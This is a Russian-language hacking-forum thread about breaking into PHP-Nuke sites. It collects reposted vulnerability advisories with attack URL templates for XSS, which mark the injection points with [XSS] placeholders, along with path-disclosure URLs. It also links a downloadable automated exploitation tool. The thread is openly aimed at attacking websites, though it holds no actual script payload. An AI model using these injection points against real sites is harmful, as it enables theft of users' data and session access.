• XSS.stack #1 – первый литературный журнал от юзеров форума

Взлом PHP-Nuke

comod

HDD-drive
Пользователь
Регистрация
09.01.2005
Сообщения
21
Реакции
0
Привет всем, подскажите пожалуйста, какие есть баги в популярных двигах для сайтов php-nuke и post-nuke?
Как их юзать и есть ли сплойты? Если можно с примерами.
Заранее благодарю всех!

[mod][Winux:] Добавлено 1 февраля 2006:
В этой теме будем обсуждать взлом этого движка.
Обратите внимание, информационная тема об этом двиге и найденых в ней багах находится ТУТ. А в этой теме будем обсуждать и решать проблемы со взломом, решать трудные ситтуации, выкладывать соответствующий софт и разрабатывать новые баги.[/mod]
 
Межсайтовый скриптинг в PHP-Nuke
Программа: PHP-Nuke 6.x, 7-7.6

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Удаленный пользователь может произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует из-за некорректной обработки входных данных в переменной ‘min’ модуля Search, переменной 'categories' модуля FAQ, переменной 'bid' модуля Banners и переменной 'ltr' модуля Encyclopedia. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/[nuke_dir]/modules.php?
name=Search&author=[author]&topic=
0&min=999999999[XSS]&query=[our query]

http://[target]/[nuke_dir]/modules.php?
name=Search&author=[author]&topic=
0&min=999999999[XSS]&query=
[our_query]&type=users&category=2

http://[target]/[nuke_dir]/modules.php?
name=Search&author=[author]&topic=
0&min=999999999[XSS]&query=
[our_query]&type=comments&categ ory=2

http://[target]/[nuke_dir]/modules.php?
name=Search&author=[author]&topic=
0&min=999999999[XSS]&query=
[our_query]&type=stories&category=2

http://[target]/[nuke_dir] /modules.php?
name=Search&author=[author]&topic=
0&min=999999999[XSS]&query=
[our_query]&type=reviews&category=2

http://[target]/[nuke_dir]/modules.php?
name=FAQ&myfaq=yes&i d_cat=1&
categories=45435[XSS]

http://[target]/[nuke_dir]/banners.php?
op=EmailStats&login=[our_login]&cid=1&bid=[XSS]

http://[target]/[nuke_dir]/modules.php?name=
Encyclopedia&file=index&op=terms&eid=1&ltr=[XSS]

Удаленный пользователь может напрямую запросить некоторые сценарии и получить данные об установочной директории приложения. Примеры:

http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=userinfo
http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=my_headlines
http://[target]/[nuke_dir]/modules.php?name=Encyclopedia&file=index&op=search

URL производителя: www.phpnuke.org

Решение: Способов устранения уязвимости не существует в настоящее время.
Источник: Securitylab.ru
 
Уязвимость существует в модуле Downloads при обработке параметра newdownloadshowdays и модуле Web_Links при обработке параметра newlinkshowdays. Злоумышленник может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере целевого пользователя в контексте безопасности уязвимого сайта. Злоумышленник может получить данные об установочной директории приложения.

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет злоумышленнику произвести XSS нападение и получить доступ к важным данным пользователей.

Пример/Эксплоит:

http://[target]/nuke75/modules.php?name=Downloads&d_op=NewDownloads&newdownloadshowdays=[xss code here]

http://[target]/nuke75/modules.php?name=Web_Links&l_op=NewLinks& newlinkshowdays=[xss code here]

http://[target]/nuke75/db/db.php

http://[target]/nuke75/index.php?inside_mod=1

http://[target]/nuke75/modules.php?name=Downloads&d_op=menu

http://[t arget]/nuke75/modules.php?name=Web_Links&l_op=menu


Решение: Способов устранения уязвимости не существует в настоящее время.
 
PHP-Nuke hacker
phpnukehacker8lf.gif

Тулза, облегчающая эксплутатацию уязвимостей в php-nuke. Все что от вас требуется - ввести УРЛ и клацнуть клавишу.
Язык тулзы - турецкий, но в принципе понятно все и так. Написана на Visual Basic 6.0

:zns5: Скачать|Download

Тулзу не юзал, но запускал (делал скрин). Вроде относительно отправки данных куда не надо - все чисто, однако с чем черт не шутит. В первй раз такую фигню вижу.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх